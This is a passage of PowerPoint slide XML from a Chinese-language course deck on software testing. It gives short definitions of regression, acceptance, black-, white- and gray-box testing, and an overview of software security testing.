            <a:ext cx="11027410" cy="5126990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义：回归测试是在系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件修改后，对先前测试过的功能进行重新测试，以确保修改没有引入新的缺陷。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：确保现有功能在软件更新或修复后依然正常工作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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软件生命周期模型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>迭代模型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99770" y="1929130"/>
            <a:ext cx="6096000" cy="3433445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>瀑布模型的小型化应用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完整的工作流程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>降低风险</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>产品无法按期进入市场的风险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>增量开支的风险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加快开发进度</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务清晰</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需求更容易随需而变</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5783580" y="2347595"/>
            <a:ext cx="4794250" cy="2696210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815340" y="5610225"/>
            <a:ext cx="5981065" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>适用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>场景：需求难以确定、不断变更的软件系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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软件测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>验收测试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87960" y="1271270"/>
            <a:ext cx="11027410" cy="5126990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>验收测试又称为用户验收测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(UAT)是由最终用户或客户进行的测试，以验证软件是否符合他们的需求和业务要求。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：确保软件在真实环境中能够正常工作，并满足用户的期望。UAT通常是在开发完成后、正式上线前进行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>生产接受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试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87960" y="1271270"/>
            <a:ext cx="11027410" cy="5126990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>生产接受测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(PAT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>又称为准生产测试，验证即将投入生产环境的系统或应用程序是否满足预定的业务需求和性能标准。PAT通常在系统上线之前进行，确保软件在真实环境中能够正常运行，并满足用户和业务的期望。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：确保系统的功能、性能和质量，降低上线风险，并提高用户满意度。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件测试方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>黑盒测试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87960" y="1271270"/>
            <a:ext cx="11027410" cy="5126990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义：这种测试方法实际是把测试对象看成是一个拆不开的物件，测试人员不清楚物件里程序内部逻辑结构和内部特性，只能依据程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统的需求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>说明书，检查程序的功能是否符合说明书所述的输入条件和输出结果。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：评估软件的功能是否符合用户要求和业务逻辑。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件测试方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>白盒测试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87960" y="1271270"/>
            <a:ext cx="11027410" cy="5126990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义：这种测试方法实际是把测试对象看成是一个拆散了的物件，测试人员把整个物件完全拆开，可以看到里面程序内部逻辑结构和所有信息，针对内部结构进行设计或选择测试用例，对程序所有逻辑进行测试，通过在各种不同的测试用例检查程序状态，确定实际状态是否与预期的状态一致。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：验证代码的执行路径、逻辑和条件，通常用于单元测试和集成测试。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件测试方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>灰盒测试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87960" y="1271270"/>
            <a:ext cx="11027410" cy="5126990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义：是介于白盒测试与黑盒测试之间的一种测试，灰盒测试多用于集成测试阶段，不仅关注输出、输入的正确性，同时也关注程序内部的情况。灰盒测试不像白盒那样详细、完整，但又比黑盒测试更关注程序的内部逻辑。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>由于测试人员对系统的内部结构有一定了解，可以更有效地发现不同模块之间的集成问题。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在系统修改或升级后，灰盒测试可以帮助验证新版本是否引入了新的缺陷，确保系统的稳定性和可靠性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件安全测试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859155" y="1675765"/>
            <a:ext cx="10069195" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是软件安全测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>确定软件的安全特性实现是否与预期设计一致的过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有关验证软件安全等级和识别潜在安全缺陷的过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查找软件自身程序设计中存在的安全隐患，并检查应用程序对非法侵入的防范能力</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="986155" y="4135120"/>
            <a:ext cx="10069195" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为什么需要软件安全测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>传统测试仅考虑软件出错时的处理，没有考虑对软件的故意攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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软件安全测试方法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857250" y="1710690"/>
            <a:ext cx="8128000" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在应用投产前，应由独立的安全团队对应用的安全性进行综合评估</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>功能性安全测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对抗性安全测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="3804920"/>
            <a:ext cx="8128000" cy="1753235"/>
